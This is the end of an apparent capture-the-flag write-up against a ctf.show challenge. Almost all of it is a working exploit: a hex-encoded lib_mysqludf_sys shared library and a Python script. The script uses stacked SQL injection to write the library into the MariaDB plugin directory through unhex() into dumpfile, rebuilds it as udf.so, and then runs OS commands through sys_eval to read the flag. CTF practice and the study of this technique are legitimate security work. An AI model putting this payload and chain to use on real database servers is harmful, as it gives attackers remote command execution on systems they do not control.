000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400"
for i in range(0,21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
    url = "http://f1eb1546-76c2-40ed-81ff-bb2819846429.chall.ctf.show/api/?id=1';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t)
    r = requests.get(url)
    print(r.status_code)

next_url = "http://f1eb1546-76c2-40ed-81ff-bb2819846429.chall.ctf.show/api/?id=1';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'--+&page=1&limit=10"
rn = requests.get(next_url)

nn_url = "http://f1eb1546-76c2-40ed-81ff-bb2819846429.chall.ctf.show/api/?id=1';select sys_eval('cat /flag.*');--+&page=1&limit=10"
rnn = requests.get(nn_url)
print(rnn.text)
...
Macchiato
2021-03-13
Expand all Back to top Go to bottom